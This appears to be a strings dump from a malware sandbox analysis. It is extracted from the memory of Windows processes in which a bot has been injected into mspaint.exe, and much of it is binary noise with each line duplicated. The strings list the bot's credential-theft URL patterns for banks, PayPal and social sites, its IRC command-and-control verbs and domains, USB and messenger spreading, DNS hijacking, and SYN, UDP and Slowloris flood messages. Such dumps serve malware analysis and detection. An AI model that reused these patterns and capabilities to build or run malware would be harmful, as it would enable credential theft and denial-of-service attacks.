6"#"5,, '556
6"#"5,, '556
P&&&M,, I223F999B@@@
P&&&M,, I223F999B@@@
$%%f f112f888f???fFFFeNMMcUUU`\\\[edeSlllHttt>|||1
$%%f f112f888f???fFFFeNMMcUUU`\\\[edeSlllHttt>|||1
Paint.NET v3.36
Paint.NET v3.36
.iu[mr
.iu[mr
hn/.nzu
hn/.nzu
.zD.k
.zD.k
.pnye%
.pnye%
y9>>.GGG
y9>>.GGG
x<.ggg>
x<.ggg>
g9>>.www]
g9>>.www]
x-|.Nh
x-|.Nh
%.WEn\
%.WEn\
%xE.h
%xE.h
dz.yqI
dz.yqI
1.WI[
1.WI[
73.ZW/
73.ZW/
u.WL*
u.WL*
3twwW...
3twwW...
=.AAZ
=.AAZ
;%CMn
;%CMn
$8z^.aUJ.;]
$8z^.aUJ.;]
L0.vvv
L0.vvv
.teaD#
.teaD#
Hq.vX=
Hq.vX=
9;
9;
%F&%}
%F&%}
L%xQ*S
L%xQ*S
qnn.VVV
qnn.VVV
Z&.NOOG
Z&.NOOG
!nnn.noo
!nnn.noo
.Jdjr9jH
.Jdjr9jH
l.nY:
l.nY:
fs.ONN
fs.ONN
.KIRn
.KIRn
b .dA)
b .dA)
t%xg?
t%xg?
.PV"8!h H
.PV"8!h H
%s899
%s899
.KM/--
.KM/--
6>t%X
6>t%X
...lww
...lww
-\|%U
-\|%U
u_U%X
u_U%X
.VVV|
.VVV|
~,..fq
~,..fq
/..fo
/..fo
j[^^.xA
j[^^.xA
Q3%x2
Q3%x2
aSSS!.DC
aSSS!.DC
\.gL1
\.gL1
xiA.Hs
xiA.Hs
W^y%...bkk
W^y%...bkk
_.do>
_.do>
VP%s7,
VP%s7,
p.TG@
p.TG@
'''.MMy
'''.MMy
.IIeJ
.IIeJ
D%uPT]
D%uPT]
JÿFp8
JÿFp8
\.zzz
\.zzz
.Egyy9
.Egyy9
%%%XXX
%%%XXX
$%s}}
$%s}}
$;;;1::*
$;;;1::*
aYsssH
aYsssH
fhI)..FYY
fhI)..FYY
8a ..FEE
8a ..FEE
3>..NR
3>..NR
SSSHKK
SSSHKK
.FGGQ[[
.FGGQ[[
\.looK
\.looK
$.UVV
$.UVV
\.LOOcaa
\.LOOcaa
.yeeE.
.yeeE.
x.%DQb
x.%DQb
.lmm)
.lmm)
(..VL
(..VL
(..VH
(..VH
.ZYYQ
.ZYYQ
;L!%C
;L!%C
^/..Fgg
^/..Fgg
QUU%C
QUU%C
J*..FYY
J*..FYY
%2SSS
%2SSS
.KTN"
.KTN"
.XPP (
.XPP (
)B!.Qh
)B!.Qh
Enn.ZZZD#
Enn.ZZZD#
7x.lllHp
7x.lllHp
x.ND
x.ND
x<.jg>
x<.jg>
J%ciR
J%ciR
W_}%S
W_}%S
Ynn.VWW%
Ynn.VWW%
S^^.UfVV
S^^.UfVV
sssHOO
sssHOO
\.TVV"''GC;
\.TVV"''GC;
.f.FZZ
.f.FZZ
Nnn.jjjT
Nnn.jjjT
#QJ.Xl
#QJ.Xl
sG.Tz
sG.Tz
O=>>.AD
O=>>.AD
mnn.ZZZd
mnn.ZZZd
* %x
* %x
d.TWW
d.TWW
(..Fvv
(..Fvv
\.TVV
\.TVV
g%%%x
g%%%x
$j[x.Qm
$j[x.Qm
sssHII
sssHII
sssHLL
sssHLL
-..bnn
-..bnn
\.ddd
\.ddd
\.LOO#33
\.LOO#33
.yeeEv
.yeeEv
BhjjBeeÿfPPP
BhjjBeeÿfPPP
.TWWC
.TWWC
(..FSS
(..FSS
.aV6q
.aV6q
T*%cY
T*%cY
WwwwW.
WwwwW.
%2uxx(
%2uxx(
*&&&0
*&&&0
_.ZlxI
_.ZlxI
-Qe}tt
-Qe}tt
P,0%%%X\\
P,0%%%X\\
3a.nN
3a.nN
.loo
.loo
ÚZV,
ÚZV,
..FQQ
..FQQ
@,..biiI
@,..biiI
.bK>?
.bK>?
.whQQ
.whQQ
u,..bkk
u,..bkk
.ED|/I
.ED|/I
-.fff
-.fff
AOO%s
AOO%s
677199)/7
677199)/7
9,..btt
9,..btt
jEnn.FFF
jEnn.FFF
ssshhh
ssshhh
'##C%C
'##C%C
{{{%8:88
{{{%8:88
.gff$B
.gff$B
^.wmrW'
^.wmrW'
:9&&&066
:9&&&066
Z[[%C$
Z[[%C$
\.LNN
\.LNN
hToo/FGG%C
hToo/FGG%C
.JKKQUU
.JKKQUU
FM.yYY
FM.yYY
.UUU"
.UUU"
\.gnn
\.gnn
\.gkk
\.gkk
\.vvvP
\.vvvP
\.GGG
\.GGG
\.Gzz:s
\.Gzz:s
-..bee
-..bee
\.dgg#77
\.dgg#77
,..rAK
,..rAK
ssshnnf6t~~>^
ssshnnf6t~~>^
,..fQZ0
,..fQZ0
Jÿf
Jÿf
Bee%u
Bee%u
Z-fggq}}M
Z-fggq}}M
U)..Fjj
U)..Fjj
.xR(/--
.xR(/--
\.lll 55
\.lll 55
[[[(..FEE
[[[(..FEE
(..Fii)
(..Fii)
HMM%.U 3
HMM%.U 3
...prr
...prr
...pqq
...pqq
\.gD6
\.gD6
Ajf%c
Ajf%c
(..Fee%
(..Fee%
\.LLL
\.LLL
.pS#qD
.pS#qD
%X!|NNNrJ*
%X!|NNNrJ*
\.Ggg
\.Ggg
-= (**
-= (**
C:\T*
C:\T*
J%fgg
J%fgg
=)..Fnn
=)..Fnn
sssH$
sssH$
KKKQ^^.IV
KKKQ^^.IV
...PTT
...PTT
...PSS
...PSS
sl!.JT
sl!.JT
sssHKK
sssHKK
\.LOO#//
\.LOO#//
uÃŒc(((
uÃŒc(((
I,..rQ
I,..rQ
\.Gzz:
\.Gzz:
\.TWWcxx
\.TWWcxx
J%FGG9
J%FGG9
gx4.jiiAEE
gx4.jiiAEE
sssHJJ
sssHJJ
ZQsssHHH@$
ZQsssHHH@$
`.zEE
`.zEE
d2,..bvv
d2,..bvv
XZZBnn.VWW
XZZBnn.VWW
hkkCoo/%D
hkkCoo/%D
,..bdd
,..bdd
La ..Fyy9
La ..Fyy9
]]](((@
]]](((@
E,..bee
E,..bee
A,..boo
A,..boo
(..fqXnn.
(..fqXnn.
...PUU
...PUU
%Unrr
%Unrr
...RD
...RD
hr.PX
hr.PX
(..ft133
(..ft133
(..fu
(..fu
,..bee
,..bee
B4?...Rb
B4?...Rb
q,..bpp
q,..bpp
...frB
...frB
\.twwcdd
\.twwcdd
g.vOO
g.vOO
SSShhh
SSShhh
N.ZZZ
N.ZZZ
N4.GGG
N4.GGG
(..Fee
(..Fee
}A.dJ
}A.dJ
B%Duo2
B%Duo2
ssshll
ssshll
Qnn.VVV
Qnn.VVV
/.myq
/.myq
Onn.rss
Onn.rss
Cnn.VWW
Cnn.VWW
q.Hl}
q.Hl}
888@}}=._
888@}}=._
(..FCC
(..FCC
\.Gaa!
\.Gaa!
.TUUq
.TUUq
"/..fh
"/..fh
.RSS111
.RSS111
RvÞe
RvÞe
4.rgddd@
4.rgddd@
MceeÃ’
MceeÃ’
,R.Sw
,R.Sw
%Mgr.RhY4RfE5Qd:5w
%Mgr.RhY4RfE5Qd:5w
y'MfR Og>-Qh".Sj
y'MfR Og>-Qh".Sj
Kha"OjR(RkB.Sj42Sh04Re15Re!5Rf
Kha"OjR(RkB.Sj42Sh04Re15Re!5Rf
Nkh$RnZ)VoH.Wn92Wn.5Vk'6Th 5Qe
Nkh$RnZ)VoH.Wn92Wn.5Vk'6Th 5Qe
.CFHSW\`}{
.CFHSW\`}{
poq.uuv
poq.uuv
ppq.qpq
ppq.qpq
{Q.JqK*
{Q.JqK*
|R.vuN,
|R.vuN,
dB%sb@$
dB%sb@$
mH('iE'$fC&Û% b@$p`?#
mH('iE'$fC&Û% b@$p`?#
dB%ubA$
dB%ubA$
{R.VxO-
{R.VxO-
|R.cvN,
|R.cvN,
8)9/959:9}9
8)9/959:9}9
:&;,;0;4;
:&;,;0;4;
7,707…8
7,707…8
7u7D7L7`7f7k7q7w7~7
7u7D7L7`7f7k7q7w7~7
8 8$8(8,808
8 8$8(8,808
: :$:(:,:0:4:8:
: :$:(:,:0:4:8:
3=3p3
3=3p3
2 2$2(2,2024282
2 2$2(2,2024282
7Â8K8n8
7Â8K8n8
$040]0{0
$040]0{0
? ?8?`?|?
? ?8?`?|?
Microsoft\Windows\CurrentVersion\Applets
Microsoft\Windows\CurrentVersion\Applets
MSFTEDIT.DLL
MSFTEDIT.DLL
.Ribbon
.Ribbon
Software\Microsoft\Windows\CurrentVersion\Applets\
Software\Microsoft\Windows\CurrentVersion\Applets\
.gdi32.dll
.gdi32.dll
\StringFileInfo\xx\OriginalFilename
\StringFileInfo\xx\OriginalFilename
\sppsvc.exe
\sppsvc.exe
\slui.exe
\slui.exe
\sppuinotify.dll
\sppuinotify.dll
%u%su
%u%su
mshelp://windows/?id=379810ee-75d9-4d02-a3b9-68cad94146aa
mshelp://windows/?id=379810ee-75d9-4d02-a3b9-68cad94146aa
DataCallback: Reason=%d Stat=%d %$=%d Offset=%d Length=%d Buf=%p
DataCallback: Reason=%d Stat=%d %$=%d Offset=%d Length=%d Buf=%p
CoGetInterfaceAndReleaseStream HRESULT=x
CoGetInterfaceAndReleaseStream HRESULT=x
CoInitialize HRESULT=x
CoInitialize HRESULT=x
CreateThread LastError=x
CreateThread LastError=x
idtGetBandedData HRESULT=x
idtGetBandedData HRESULT=x
WriteMultiple HRESULT=x
WriteMultiple HRESULT=x
DeviceDlg HRESULT=x
DeviceDlg HRESULT=x
SelectDeviceDlg HRESULT=x
SelectDeviceDlg HRESULT=x
Software\%s\%s\%s
Software\%s\%s\%s
Microsoft-Windows-MSPaint/Admin
Microsoft-Windows-MSPaint/Admin
Microsoft-Windows-MSPaint/Diagnostic
Microsoft-Windows-MSPaint/Diagnostic
Microsoft-Windows-MSPaint/Debug
Microsoft-Windows-MSPaint/Debug
Save operation result
Save operation result
Resize skew Operation result
Resize skew Operation result
FlipOperation
FlipOperation
RotateOperation
RotateOperation
CropOperation
CropOperation
InvertColorOperation
InvertColorOperation
ResizeSkewOperation
ResizeSkewOperation
6.1.7600.16385 (win7_rtm.090713-1255)
6.1.7600.16385 (win7_rtm.090713-1255)
MSPAINT.EXE
MSPAINT.EXE
Windows
Windows
Operating System
Operating System
6.1.7600.16385
6.1.7600.16385
svchost.exe_2972:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
msvcrt.dll
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
RPCRT4.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
_amsg_exit
_amsg_exit
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
svchost.pdb
svchost.pdb
version="5.1.0.0"
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
name="Microsoft.Windows.Services.SvcHost"
Host Process for Windows Services
Host Process for Windows Services
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
\PIPE\
Host Process for Windows Services
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
6.1.7600.16385
6.1.7600.16385
mspaint.exe_316_rwx_03660000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0g
tlSSSSSSSSSShL0g
Fv.TBv
Fv.TBv
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
-%sMutex
-%sMutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
hXXp://%s/%s
hXXp://%s/%s
hXXp://%s/
hXXp://%s/
POST /23s
POST /23s
[%s{%s%s{%s
[%s{%s%s{%s
n%s[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
hXXp://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
/c "start %Ã%%.Trashes\%s
.Trashes
.Trashes
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.scr
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
a.baerr000.ru
a.baerr000.ru
a.joerv06.com
a.joerv06.com
a.tsroxybaa.com
a.tsroxybaa.com
fbi.gov
fbi.gov
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
SSRR %s 0 0 :%s
KCIK %s
KCIK %s
SEND %s %s
SEND %s %s
PART %s
PART %s
PPPPMSG %s :%s
PPPPMSG %s :%s
QUIT :%s
QUIT :%s
PPNG %s
PPNG %s
PPPPMSG
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
hXXp://api.wipmania.com/
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
c:\%original file name%.exe
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
\\.\pipe\312a36d2
\\.\pipe\312a36d2
C:\Windows\system32\mspaint.exe
C:\Windows\system32\mspaint.exe
C:\Windows
C:\Windows
312a36d2.scr
312a36d2.scr
7 767
7 767
8*808;8~8
8*808;8~8
%s\Microsoft\%s.exe
%s\Microsoft\%s.exe
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
mspaint.exe
mspaint.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Windows\System32\mspaint.exe
\Device\HarddiskVolume1\Windows\System32\mspaint.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming
C:\Users\"%CurrentUserName%"\AppData\Roaming
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.tmp
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.tmp
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
B5D6.exe_1928:
.text
.text
`.rdata
`.rdata
XGZ^%s
XGZ^%s
tcP$a
tcP$a
#>n%D
#>n%D
B5D6.exe_1928_rwx_00170000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
Fv.TBv
Fv.TBv
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
